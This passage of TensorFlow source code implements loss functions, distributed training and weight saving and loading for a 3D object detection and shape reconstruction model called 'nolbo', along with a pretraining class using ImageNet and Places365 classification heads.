objCenter2D_xyz = tf.stack([objCenter2D_xz, objCenter2D_yz, self._localZ[...,0], tf.ones_like(self._localZ[...,0])], axis=-1)
self._localXYZ = self._matmul4x1(self._P2_inv_gt, objCenter2D_xyz)[..., 0:3]
def _calcBbox3Dand2D(self):
b, gr, gc, pr, _ = tf.shape(self._cos)
zx_norm = tf.sqrt(tf.square(self._localXYZ[..., -1]) + tf.square(self._localXYZ[..., 0]))
s_ray, c_ray = tf.expand_dims(self._localXYZ[..., 0] / zx_norm, axis=-1), tf.expand_dims(self._localXYZ[..., -1] / zx_norm, axis=-1)
s_ray, c_ray = tf.constant(s_ray.numpy()), tf.constant(c_ray.numpy())
self._sin_ry = s_ray * self._cos + c_ray * self._sin
self._cos_ry = c_ray * self._cos - s_ray * self._sin
# self._cos_ry, self._sin_ry = self._cos, self._sin
zero = tf.zeros_like(self._cos_ry)
one = tf.ones_like(self._cos_ry)
self._R = tf.reshape(tf.concat([self._cos_ry, zero, self._sin_ry,
zero, one, zero,
-self._sin_ry, zero, self._cos_ry]
, axis=-1), [b, gr, gc, pr, 3, 3])
self._bbox3D8Points, self._bbox2D_dim = self._get3DBboxAnd2DPorj(self._P2_gt, self._R, self._localXYZ, tf.constant(self._bbox3D_dim.numpy()))
# self._bbox3D8Points
# self._bbox2D_dim
#
def _getbbox2DIOU(self):
xmin_gt, ymin_gt, xmax_gt, ymax_gt = self._bbox2D_dim_gt[..., 0], self._bbox2D_dim_gt[..., 1], self._bbox2D_dim_gt[..., 2], self._bbox2D_dim_gt[..., 3]
xmin, ymin, xmax, ymax = self._bbox2D_dim[..., 0], self._bbox2D_dim[..., 1], self._bbox2D_dim[..., 2], self._bbox2D_dim[..., 3]
xmin_int = tf.math.maximum(xmin_gt, xmin)
ymin_int = tf.math.maximum(ymin_gt, ymin)
xmax_int = tf.math.minimum(xmax_gt, xmax)
ymax_int = tf.math.minimum(ymax_gt, ymax)
intersection_xlen = tf.maximum(xmax_int - xmin_int, 0.0)
intersection_ylen = tf.maximum(ymax_int - ymin_int, 0.0)
# print(intersection_xlen)
# print(self._bbox2D_tile)
intersection_area = intersection_xlen * intersection_ylen
box_gt_area = (xmax_gt - xmin_gt) * (ymax_gt - ymin_gt)
box_pr_area = (xmax - xmin) * (ymax - ymin)
union_area = tf.maximum(box_gt_area + box_pr_area - intersection_area, 1e-9)
self._IOU = tf.clip_by_value(intersection_area/union_area, 0., 1.)
xmin_out = tf.minimum(xmin_gt, xmin)
ymin_out = tf.minimum(ymin_gt, ymin)
xmax_out = tf.maximum(xmax_gt, xmax)
ymax_out = tf.maximum(ymax_gt, ymax)
outer_xlen = tf.maximum(xmax_out - xmin_out, 0.)
outer_ylen = tf.maximum(ymax_out - ymin_out, 0.)
c2 = tf.square(outer_xlen) + tf.square(outer_ylen) # sqr of diagonal length of max-outer box
c2 = tf.maximum(c2, 1e-9)
box_gt_x = (xmax_gt + xmin_gt) / 2.
box_gt_y = (ymax_gt + ymin_gt) / 2.
box_pr_x = (xmax + xmin) / 2.
box_pr_y = (ymax + ymin) / 2.
center_diff2 = tf.square(box_gt_x - box_pr_x) + tf.square(box_gt_y - box_pr_y)
self._RDIOU = center_diff2 / c2
def _bbox2DLoss(self):
# tile shape = (batch, gridy, gridx, 2*predictornum, hwxy)
square_d_xy = tf.reduce_sum(tf.square(self._bbox2D_xy - self._bbox2D_xy_gt), axis=-1)
h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
obj_mask = tf.reshape(self._objness_gt, tf.shape(self._objness_gt)[:-1])
d_h = obj_mask * (h_pred - h_gt)
d_w = obj_mask * (w_pred - w_gt)
self._box_loss_scale = tf.constant((2. - w_gt * h_gt).numpy())
xy_loss = obj_mask * self._box_loss_scale * square_d_xy
hw_loss = obj_mask * self._box_loss_scale * (tf.square(d_h) + tf.square(d_w))
self._loss_bbox2D_xy = tf.reduce_sum(xy_loss, axis=[1,2,3])
self._loss_bbox2D_hw = tf.reduce_sum(hw_loss, axis=[1, 2, 3])
def _objnessLoss(self):
d_objness = -self._objness_gt * tf.math.log(self._objness + 1e-10) # * tf.square(tf.square(self._sin) + tf.square(self._cos))
d_no_objness = - (1.-self._objness_gt) * tf.math.log(1.-self._objness + 1e-10)
# d_no_objness = self._ignore_mask * d_no_objness[..., 0]
# d_no_objness = d_no_objness[..., 0]
self._loss_objness = tf.reduce_sum(d_objness, axis=[1, 2, 3, 4])
self._loss_no_objness = tf.reduce_sum(d_no_objness, axis=[1, 2, 3, 4])
def _smoothL1(self, x_src, x_trg, cond):
# return tf.losses.huber(x_src, x_trg, cond)
return tf.where(tf.abs(x_src - x_trg) > cond, tf.abs(x_src - x_trg) - 0.5 * cond, 0.5 / cond * tf.square(x_src - x_trg))
def _bbox2DLossCIOU(self):
obj_mask = self._objness_gt[..., 0]
pi = 3.14159265358979323846
# v = ((atan(w/h_gt) - atan(w/h_pr)) / (pi/2) )^2
# bbox = hwxy
h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
ar_gt = w_gt / (h_gt + 1e-9)
ar = w_pred / (h_pred + 1e-9)
v = 4. / (pi * pi) * tf.square(tf.atan(ar_gt) - tf.atan(ar))
alpha = v / (1. - self._IOU + v + 1e-9)
loss_CIOU = obj_mask * (1. - self._IOU + self._RDIOU + alpha * v)
# loss_CIOU = obj_mask * (1. - self._IOU)
bbox_coor_loss = obj_mask * tf.reduce_sum(self._smoothL1(self._bbox2D_dim, self._bbox2D_dim_gt, 1e-4), axis=-1)
# bbox_coor_loss = obj_mask * tf.reduce_sum(tf.square(self._bbox2D_dim - self._bbox2D_dim_gt), axis=-1)
self._loss_bbox2D_CIOU = tf.reduce_sum(loss_CIOU + bbox_coor_loss, axis=[1, 2, 3])
# loss_IOU = obj_mask * (1. - self._IOU)
# self._loss_bbox2D_IOU = tf.reduce_sum(loss_IOU, axis=[1,2,3])
def _bbox3DLoss(self):
self._loss_bbox3D = tf.reduce_sum(self._objness_gt * tf.square(self._bbox3D_dim_gt-self._bbox3D_dim), axis=[1,2,3,4])
# self._loss_bbox3D = tf.reduce_sum(self._objness_gt * self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, cond=1e-5), axis=[1,2,3,4])
# self._loss_bbox3D = tf.reduce_sum(self._objness_gt * tf.expand_dims(self._box_loss_scale, axis=-1) * self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, 0.01), axis=[1, 2, 3, 4])
# # obj_mask = tf.reshape(self._obj_mask, tf.shape(self._obj_mask)[:-1])
# d = self._obj_mask * (self._bbox3D_tile - self._bbox3D_gt_tile)
#
# obj_mask = tf.reshape(self._obj_mask, tf.shape(self._obj_mask)[:-1])
# box_loss_scale = obj_mask * (2. - self._bbox2D_gt_tile[..., 0] * self._bbox2D_gt_tile[..., 1])
# d = box_loss_scale * tf.reduce_sum(d, axis=-1)
#
# # d shape = (batch, gridy, gridx, 2*predictornum, whl)
# self._loss_bbox3D = tf.reduce_sum(tf.square(d), axis=[1, 2, 3])
def _bbox3DIoULoss(self):
IoU_3d = cal_iou_3d(box3d1=self._bbox3D8Points_gt, box3d2=self._bbox3D8Points,
lhw1=self._bbox3D_dim_gt, lhw2=self._bbox3D_dim)
# print(IoU_3d.shape)
obj_mask = self._objness_gt[..., 0]
# print(obj_mask.shape)
self._loss_bbox3D_IoU = obj_mask * (1. - IoU_3d)
self._loss_bbox3D_IoU = tf.reduce_sum(self._loss_bbox3D_IoU , axis=[1, 2, 3])
bbox_coor_loss = tf.reduce_sum(self._smoothL1(self._bbox3D8Points, self._bbox3D8Points_gt, 0.01), axis=[4, 5])
# bbox_coor_loss = tf.reduce_sum(tf.square(self._bbox3D8Points - self._bbox3D8Points_gt), axis=[4, 5])
# print(bbox_coor_loss.shape)
bbox_coor_loss = tf.reduce_sum(obj_mask * bbox_coor_loss, axis=[1, 2, 3])
# print(bbox_coor_loss.shape)
self._loss_bbox3D_IoU += bbox_coor_loss
# print(tf.reduce_sum(IoU_3d) / tf.reduce_sum(obj_mask))
def _localXYZLoss(self):
localZ_gt = tf.expand_dims(self._localXYZ_gt[..., -1], axis=-1)
loss_localXYZ_Bayesian = tf.square(self._localZ - localZ_gt) / (tf.exp(self._localZ_logvar) + 1e-9) + self._localZ_logvar
# loss_localXYZ_Bayesian = self._localXYZ_log_var_tile
# loss_localXYZ_Euclidian = tf.abs(self._localXYZ-self._localXYZ_gt)
# loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ, self._localXYZ_gt, 0.001) * tf.expand_dims(self._box_loss_scale, axis=-1)
# loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ[..., -1], self._localXYZ_gt[..., -1], 0.001) * self._box_loss_scale
loss_localXYZ_Euclidian = tf.square(self._localZ - localZ_gt)# * tf.expand_dims(self._box_loss_scale, axis=-1)
# loss_localXYZ_Euclidian = 100. * tf.expand_dims(tf.square(self._localZ[..., 0] - self._localXYZ_gt[..., 2]), axis=-1)# * tf.expand_dims(self._box_loss_scale, axis=-1)
# self._loss_localXYZ = tf.reduce_sum(self._objness_gt * 0.1 * loss_localXYZ_Bayesian, axis=[1, 2, 3, 4])
self._loss_localXYZ_Bayesian = 100. * tf.reduce_sum(self._objness_gt * loss_localXYZ_Bayesian, axis=[1, 2, 3, 4])
self._loss_localXYZ_Euclidian = 100. * tf.reduce_sum(self._objness_gt * loss_localXYZ_Euclidian, axis=[1, 2, 3, 4])
def _getEV(self, sin, cos, radLogVar):
Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
-tf.exp(radLogVar)) * sin * sin
Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
-tf.exp(radLogVar)) * cos * cos
logVarsin = tf.math.log(Varsin + 1e-7)
logVarcos = tf.math.log(Varcos + 1e-7)
return Esin, Ecos, logVarsin, logVarcos
def _poseLoss(self):
Esin, Ecos, _, _ = self._getEV(sin=self._sin, cos=self._cos, radLogVar=tf.math.log(self._rad_var))
Esin_gt, Ecos_gt, logvarsin_gt, logvarcos_gt = self._getEV(sin=self._sin_gt, cos=self._cos_gt, radLogVar=tf.math.log(self._rad_var))
#
_, _, logvarsin, logvarcos = self._getEV(sin=self._sin, cos=self._cos, radLogVar=self._rad_logvar)
self._loss_sincos_bayesian = tf.square(self._sin - self._sin_gt)/tf.exp(logvarsin) + logvarsin
self._loss_sincos_bayesian += tf.square(self._cos - self._cos_gt)/tf.exp(logvarcos) + logvarcos
#
self._loss_sincos = tf.square(Esin-Esin_gt)/tf.exp(logvarsin_gt) + tf.square(Ecos-Ecos_gt)/tf.exp(logvarcos_gt)
self._loss_sincos += tf.square(1. - (self._sin * self._sin_gt + self._cos * self._cos_gt)) # inner product
self._loss_sincos += tf.square(self._sin - self._sin_gt) + tf.square(self._cos - self._cos_gt) # cross product, 1st and 2nd component
self._loss_sincos += tf.square(self._sin * self._cos_gt - self._cos * self._sin_gt) # cross product, 3rd component
scsquaresum = tf.square(self._sin) + tf.square(self._cos)
self._loss_sincos1 = tf.square(1. - scsquaresum)
self._loss_sincos_bayesian = tf.reduce_sum(self._objness_gt * self._loss_sincos_bayesian, axis=[1, 2, 3, 4])
self._loss_sincos = tf.reduce_sum(self._objness_gt * self._loss_sincos, axis=[1, 2, 3, 4])
self._loss_sincos1 = tf.reduce_sum(self._objness_gt * self._loss_sincos1, axis=[1, 2, 3, 4])
# + 0.1 * tf.reduce_mean(self._loss_sincos1, axis=[1, 2, 3, 4])
def _objnessEval(self):
self._obj_prb = (
tf.reduce_sum(self._objness_gt * self._objness, axis=[1, 2, 3, 4])
/ tf.reduce_sum(self._objness_gt, axis=[1, 2, 3, 4]))
self._no_obj_prb = (
tf.reduce_sum((1.0 - self._objness_gt) * (1.0 - self._objness), axis=[1, 2, 3, 4])
/ tf.reduce_sum(1.0 - self._objness_gt, axis=[1, 2, 3, 4]))
class nolbo_single(object):
def __init__(self, encoder_backbone=None,
decoder_structure=None,
prior_class_structure=None,
prior_inst_structure=None,
BATCH_SIZE_PER_REPLICA=32, strategy=None,
learning_rate = 1e-4
):
self._rad_var = (15.0/180.0 * 3.141593) ** 2
self._dec_str = decoder_structure
self._prior_cl_str = prior_class_structure
self._prior_inst_str = prior_inst_structure
self._strategy = strategy
# self._strategy = tf.distribute.MirroredStrategy()
self._GLOBAL_BATCH_SIZE = BATCH_SIZE_PER_REPLICA * self._strategy.num_replicas_in_sync
with self._strategy.scope():
self._encoder_backbone = encoder_backbone
self._buildModel()
self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
# self._optimizer = tf.keras.optimizers.Nadam(learning_rate=learning_rate)
# self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate)
def _buildModel(self):
print('build models....')
# ==============set encoder head
self._encoder_head = darknet.head2D(name='nolbo_encoder_head',
input_shape=self._encoder_backbone.output_shape[1:],
output_dim=(2*3+3 + 2*(8+8)),
filter_num_list=[1024, 1024, 1024],
filter_size_list=[3, 3, 3],
last_pooling='max', activation='elu')
# ==============set decoder3D
self._decoder = ae3D.decoder3D(structure=self._dec_str)
self._priornet_cl = priornet.priornet(structure=self._prior_cl_str)
self._priornet_inst = priornet.priornet(structure=self._prior_inst_str)
print('done')
def fit(self, inputs):
class_list, inst_list, sin_gt, cos_gt, input_images, output_images_gt = inputs
with tf.GradientTape() as tape:
# get encoder output
enc_output = self._encoder_head(self._encoder_backbone(input_images, training=True), training=True)
inst_mean = enc_output[..., :8]
inst_log_var = enc_output[..., 8:16]
class_mean = enc_output[..., 16:16+8]
class_log_var = enc_output[..., 16+8:16+16]
sin_mean = tf.tanh(enc_output[..., 16+16: 16+16+3])
cos_mean = tf.tanh(enc_output[..., 16+16+3:16+16+3+3])
rad_log_var = enc_output[..., 16+16+3+3:]
mean = tf.concat([inst_mean, class_mean], axis=-1)
log_var = tf.concat([inst_log_var, class_log_var], axis=-1)
latents = sampling(mu=mean, logVar=log_var)
loss_sincos_kl, loss_sincos_mse, loss_sincos_1 = self._poseLoss(
sin_gt=sin_gt, cos_gt=cos_gt, rad_var_gt=self._rad_var,
sin=sin_mean, cos=cos_mean, rad_log_var=rad_log_var)
inst_mean_prior, inst_log_var_prior = self._priornet_inst(tf.concat([class_list, inst_list], axis=-1), training=True)
class_mean_prior, class_log_var_prior = self._priornet_cl(class_list, training=True)
mean_prior = tf.concat([inst_mean_prior, class_mean_prior], axis=-1)
log_var_prior = tf.concat([inst_log_var_prior, class_log_var_prior], axis=-1)
output_images = self._decoder(latents, training=True)
loss_shape = binary_loss(xPred=output_images, xTarget=output_images_gt, gamma=0.60)
loss_latent_kl = kl_loss(mean=mean, logVar=log_var, mean_target=mean_prior, logVar_target=log_var_prior)
loss_inst_prior_reg = regulizer_loss(z_mean=inst_mean_prior, z_logVar=inst_log_var_prior,
dist_in_z_space=5.0 * 8, class_input=class_list)
loss_class_prior_reg = regulizer_loss(z_mean=class_mean_prior, z_logVar=class_log_var_prior,
dist_in_z_space=5.0 * 8)
loss_sincos_kl = tf.nn.compute_average_loss(loss_sincos_kl, global_batch_size=self._GLOBAL_BATCH_SIZE)
loss_sincos_mse = tf.nn.compute_average_loss(loss_sincos_mse, global_batch_size=self._GLOBAL_BATCH_SIZE)
loss_sincos_1 = tf.nn.compute_average_loss(loss_sincos_1, global_batch_size=self._GLOBAL_BATCH_SIZE)
loss_shape = tf.nn.compute_average_loss(loss_shape, global_batch_size=self._GLOBAL_BATCH_SIZE)
loss_latent_kl = tf.nn.compute_average_loss(loss_latent_kl, global_batch_size=self._GLOBAL_BATCH_SIZE)
loss_prior_reg = tf.nn.compute_average_loss(loss_inst_prior_reg+loss_class_prior_reg, global_batch_size=self._GLOBAL_BATCH_SIZE)
total_loss = (
loss_sincos_kl + 100.0 * loss_sincos_mse + 1000.0 * loss_sincos_1
+ loss_shape
+ loss_latent_kl
+ 0.01 * loss_prior_reg
)
trainable_variables = self._encoder_backbone.trainable_variables + self._encoder_head.trainable_variables \
+ self._decoder.trainable_variables + self._priornet_inst.trainable_variables + self._priornet_cl.trainable_variables
grads = tape.gradient(total_loss, trainable_variables)
self._optimizer.apply_gradients(zip(grads, trainable_variables))
TP, FP, FN = voxelPrecisionRecall(xTarget=output_images_gt, xPred=output_images)
pr = tf.nn.compute_average_loss(TP / (TP + FP + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE)
rc = tf.nn.compute_average_loss(TP / (TP + FN + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE)
return loss_sincos_kl, loss_sincos_mse, loss_sincos_1,\
loss_shape, loss_latent_kl, loss_prior_reg,\
pr, rc
def distributed_fit(self, inputs):
sckl, scmse, sc1, s, lkl, reg, pr, rc = self._strategy.run(self.fit, args=(inputs,))
sckl = self._strategy.reduce(tf.distribute.ReduceOp.SUM, sckl, axis=None)
scmse = self._strategy.reduce(tf.distribute.ReduceOp.SUM, scmse, axis=None)
sc1 = self._strategy.reduce(tf.distribute.ReduceOp.SUM, sc1, axis=None)
s = self._strategy.reduce(tf.distribute.ReduceOp.SUM, s, axis=None)
lkl = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lkl, axis=None)
reg = self._strategy.reduce(tf.distribute.ReduceOp.SUM, reg, axis=None)
pr = self._strategy.reduce(tf.distribute.ReduceOp.SUM, pr, axis=None)
rc = self._strategy.reduce(tf.distribute.ReduceOp.SUM, rc, axis=None)
return sckl, scmse, sc1, s, lkl, reg, pr, rc
def saveEncoderBackbone(self, save_path):
file_name = 'nolbo_encoder_backbone'
self._encoder_backbone.save_weights(os.path.join(save_path, file_name))
def saveEncoderHead(self, save_path):
file_name = 'nolbo_encoder_head'
self._encoder_head.save_weights(os.path.join(save_path, file_name))
def saveEncoder(self, save_path):
self.saveEncoderBackbone(save_path=save_path)
self.saveEncoderHead(save_path=save_path)
def saveDecoder(self, save_path):
file_name = self._dec_str['name']
self._decoder.save_weights(os.path.join(save_path, file_name))
def savePriornet(self, save_path):
file_name_inst = self._prior_inst_str['name']
file_name_class = self._prior_cl_str['name']
self._priornet_inst.save_weights(os.path.join(save_path, file_name_inst))
self._priornet_cl.save_weights(os.path.join(save_path, file_name_class))
def saveModel(self, save_path):
self.saveEncoder(save_path=save_path)
self.saveDecoder(save_path=save_path)
self.savePriornet(save_path=save_path)
def loadEncoderBackbone(self, load_path, file_name=None):
if file_name == None:
file_name = 'nolbo_encoder_backbone'
self._encoder_backbone.load_weights(os.path.join(load_path, file_name))
def loadEncoderHead(self, load_path, file_name=None):
if file_name == None:
file_name = 'nolbo_encoder_head'
self._encoder_head.load_weights(os.path.join(load_path, file_name))
def loadEncoder(self, load_path):
self.loadEncoderBackbone(load_path=load_path)
self.loadEncoderHead(load_path=load_path)
def loadDecoder(self, load_path, file_name=None):
if file_name == None:
file_name = self._dec_str['name']
self._decoder.load_weights(os.path.join(load_path, file_name))
def loadPriornet(self, load_path, file_name=None):
file_name_inst = self._prior_inst_str['name']
file_name_class = self._prior_cl_str['name']
self._priornet_inst.load_weights(os.path.join(load_path, file_name_inst))
self._priornet_cl.load_weights(os.path.join(load_path, file_name_class))
def loadModel(self, load_path):
self.loadEncoder(load_path=load_path)
self.loadDecoder(load_path=load_path)
self.loadPriornet(load_path=load_path)
def _getEV(self, sin, cos, radLogVar):
Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
-tf.exp(radLogVar)) * sin * sin
Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
-tf.exp(radLogVar)) * cos * cos
logVarsin = tf.math.log(Varsin + 1e-7)
logVarcos = tf.math.log(Varcos + 1e-7)
return Esin, Ecos, logVarsin, logVarcos
def _poseLoss(self, sin_gt, cos_gt, rad_var_gt, sin, cos, rad_log_var):
Esin_gt, Ecos_gt, log_var_sin_gt, log_var_cos_gt = self._getEV(
sin=sin_gt, cos=cos_gt, radLogVar=tf.math.log(rad_var_gt+1e-7))
Esin_pr, Ecos_pr, log_var_sin_pr, log_var_cos_pr = self._getEV(
sin=sin, cos=cos, radLogVar=rad_log_var)
loss_sin_kl = kl_loss(mean=Esin_pr, logVar=log_var_sin_pr, mean_target=Esin_gt, logVar_target=log_var_sin_gt)
loss_cos_kl = kl_loss(mean=Ecos_pr, logVar=log_var_cos_pr, mean_target=Ecos_gt, logVar_target=log_var_cos_gt)
sinz = sampling(mu=Esin_pr, logVar=log_var_sin_pr)
cosz = sampling(mu=Ecos_pr, logVar=log_var_cos_pr)
loss_sincos_mse = tf.square(sin_gt - sin)/tf.exp(log_var_sin_gt) \
+ tf.square(cos_gt - cos)/tf.exp(log_var_cos_gt) \
+ tf.square(rad_log_var - tf.math.log(rad_var_gt+1e-9)) \
+ tf.square(sin_gt - sinz) + tf.square(cos_gt - cosz)
# + tf.square(Esin_gt - Esin_pr) + tf.square(Ecos_gt - Ecos_pr) \
# + tf.square(self._ori_sin_gt_tile - self._ori_sin_mean_tile)+ tf.square(self._ori_cos_gt_tile - self._ori_cos_mean_tile) \
# self._loss_sincos_mse = tf.square(self._ori_sin_gt_tile - self._ori_sin_mean_tile) \
# + tf.square(self._ori_cos_gt_tile - self._ori_cos_mean_tile) \
# + tf.square(self._rad_log_var_tile - tf.math.log(self._rad_var+1e-9))
loss_sincos_1 = tf.square(tf.square(sin)+tf.square(cos) - 1.0)
return loss_sin_kl + loss_cos_kl, loss_sincos_mse, loss_sincos_1
class pretrain_integrated(object):
def __init__(self,
backbone_style=None,
encoder_backbone=None,
decoder_structure=None,
prior_class_structure=None,
prior_inst_structure=None,
BATCH_SIZE_PER_REPLICA_nolbo=32,
BATCH_SIZE_PER_REPLICA_classifier=64,
strategy=None,
learning_rate = 1e-4
):
self._encoder_backbone = encoder_backbone
self._backbone_style = backbone_style
self._rad_var = (15.0/180.0 * 3.141593) ** 2
self._dec_str = decoder_structure
self._prior_cl_str = prior_class_structure
self._prior_inst_str = prior_inst_structure
self._strategy = strategy
# self._strategy = tf.distribute.MirroredStrategy()
self._GLOBAL_BATCH_SIZE_nolbo = BATCH_SIZE_PER_REPLICA_nolbo * self._strategy.num_replicas_in_sync
self._GLOBAL_BATCH_SIZE_classifier = BATCH_SIZE_PER_REPLICA_classifier * self._strategy.num_replicas_in_sync
with self._strategy.scope():
self._buildModel()
self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
# self._optimizer = tf.keras.optimizers.Nadam(learning_rate=learning_rate)
# self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate)
def _buildModel(self):
print('build models....')
if self._encoder_backbone == None:
self._encoder_backbone = self._backbone_style(name='backbone', activation='elu')
# ================================= set model head
self._encoder_head_imagenet = darknet.head2D(name='head_imagenet',
input_shape=self._encoder_backbone.output_shape[1:],
output_dim=1000,
filter_num_list=[],
filter_size_list=[],
last_pooling='max', activation='elu')
self._encoder_head_place365 = darknet.head2D(name='head_imagenet',
input_shape=self._encoder_backbone.output_shape[1:],
output_dim=365,
filter_num_list=[],
filter_size_list=[],
last_pooling='max', activation='elu')
# ==============set encoder head
self._encoder_head_nolbo = darknet.head2D(name='head_nolbo',
input_shape=self._encoder_backbone.output_shape[1:],
output_dim=(2*3+3 + 2*(8+8)),
filter_num_list=[1024, 1024, 1024],
filter_size_list=[3, 3, 3],
last_pooling='max', activation='elu')
# ==============set decoder3D
self._decoder = ae3D.decoder3D(structure=self._dec_str)
self._priornet_cl = priornet.priornet(structure=self._prior_cl_str)
self._priornet_inst = priornet.priornet(structure=self._prior_inst_str)
print('done')
# @tf.function
def _lossObject(self, y_target, y_pred):
y_pred = tf.nn.softmax(y_pred)
loss = -tf.reduce_sum(y_target * tf.math.log(y_pred + 1e-9), axis=-1)
return tf.nn.compute_average_loss(loss, global_batch_size=self._GLOBAL_BATCH_SIZE_classifier)
# @tf.function
def _evaluation(self, y_target, y_pred):
gt = tf.argmax(y_target, axis=-1)
pr = tf.argmax(y_pred, axis=-1)
equality = tf.equal(pr, gt)
acc_top1 = tf.cast(equality, tf.float32)
acc_top5 = tf.cast(
tf.math.in_top_k(
predictions=y_pred,
targets=gt, k=5
),
tf.float32)
return tf.nn.compute_average_loss(
acc_top1, global_batch_size=self._GLOBAL_BATCH_SIZE_classifier
), tf.nn.compute_average_loss(
acc_top5, global_batch_size=self._GLOBAL_BATCH_SIZE_classifier
)
def fit(self, inputs_imagenet, inputs_place365, inputs_nolbo):
input_images_imagenet, class_list_imagenet = inputs_imagenet
input_images_place365, class_list_place365 = inputs_place365
class_list, inst_list, sin_gt, cos_gt, input_images, output_images_gt = inputs_nolbo
with tf.GradientTape() as tape:
class_list_imagenet_pred = self._encoder_head_imagenet(self._encoder_backbone(input_images_imagenet, training=True), training=True)
pred_loss_imagenet = self._lossObject(y_target=class_list_imagenet, y_pred=class_list_imagenet_pred)
class_list_place365_pred = self._encoder_head_place365(self._encoder_backbone(input_images_place365, training=True), training=True)
pred_loss_place365 = self._lossObject(y_target=class_list_place365, y_pred=class_list_place365_pred)
# get encoder output
enc_output = self._encoder_head_nolbo(self._encoder_backbone(input_images, training=True), training=True)
inst_mean = enc_output[..., :8]
inst_log_var = enc_output[..., 8:16]
class_mean = enc_output[..., 16:16+8]
class_log_var = enc_output[..., 16+8:16+16]
sin_mean = tf.tanh(enc_output[..., 16+16: 16+16+3])
cos_mean = tf.tanh(enc_output[..., 16+16+3:16+16+3+3])
rad_log_var = enc_output[..., 16+16+3+3:]
mean = tf.concat([inst_mean, class_mean], axis=-1)
log_var = tf.concat([inst_log_var, class_log_var], axis=-1)
latents = sampling(mu=mean, logVar=log_var)
loss_sincos_kl, loss_sincos_mse, loss_sincos_1 = self._poseLoss(
sin_gt=sin_gt, cos_gt=cos_gt, rad_var_gt=self._rad_var,
sin=sin_mean, cos=cos_mean, rad_log_var=rad_log_var)
inst_mean_prior, inst_log_var_prior = self._priornet_inst(tf.concat([class_list, inst_list], axis=-1), training=True)
class_mean_prior, class_log_var_prior = self._priornet_cl(class_list, training=True)
mean_prior = tf.concat([inst_mean_prior, class_mean_prior], axis=-1)
log_var_prior = tf.concat([inst_log_var_prior, class_log_var_prior], axis=-1)
output_images = self._decoder(latents, training=True)
loss_shape = binary_loss(xPred=output_images, xTarget=output_images_gt, gamma=0.60)
loss_latent_kl = kl_loss(mean=mean, logVar=log_var, mean_target=mean_prior, logVar_target=log_var_prior)
loss_inst_prior_reg = regulizer_loss(z_mean=inst_mean_prior, z_logVar=inst_log_var_prior,
dist_in_z_space=5.0 * 8, class_input=class_list)
loss_class_prior_reg = regulizer_loss(z_mean=class_mean_prior, z_logVar=class_log_var_prior,
dist_in_z_space=5.0 * 8)
loss_sincos_kl = tf.nn.compute_average_loss(loss_sincos_kl, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
loss_sincos_mse = tf.nn.compute_average_loss(loss_sincos_mse, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
loss_sincos_1 = tf.nn.compute_average_loss(loss_sincos_1, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
loss_shape = tf.nn.compute_average_loss(loss_shape, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
loss_latent_kl = tf.nn.compute_average_loss(loss_latent_kl, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
loss_prior_reg = tf.nn.compute_average_loss(loss_inst_prior_reg+loss_class_prior_reg, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
total_loss = (
pred_loss_imagenet
+ pred_loss_place365
+ loss_sincos_kl + 100.0 * loss_sincos_mse + 1000.0 * loss_sincos_1
+ loss_shape
+ loss_latent_kl
+ 0.01 * loss_prior_reg
)
trainable_variables = self._encoder_backbone.trainable_variables\
+ self._encoder_head_imagenet.trainable_variables + self._encoder_head_place365.trainable_variables + self._encoder_head_nolbo.trainable_variables \
+ self._decoder.trainable_variables + self._priornet_inst.trainable_variables + self._priornet_cl.trainable_variables
grads = tape.gradient(total_loss, trainable_variables)
self._optimizer.apply_gradients(zip(grads, trainable_variables))
acc_top1_imagenet, acc_top5_imagenet = self._evaluation(y_target=class_list_imagenet, y_pred=class_list_imagenet_pred)
acc_top1_place365, acc_top5_place365 = self._evaluation(y_target=class_list_place365, y_pred=class_list_place365_pred)
TP, FP, FN = voxelPrecisionRecall(xTarget=output_images_gt, xPred=output_images)
pr = tf.nn.compute_average_loss(TP / (TP + FP + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
rc = tf.nn.compute_average_loss(TP / (TP + FN + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
return pred_loss_imagenet, pred_loss_place365, acc_top1_imagenet, acc_top1_place365, \
acc_top5_imagenet, acc_top5_place365, loss_sincos_mse, loss_shape, pr, rc
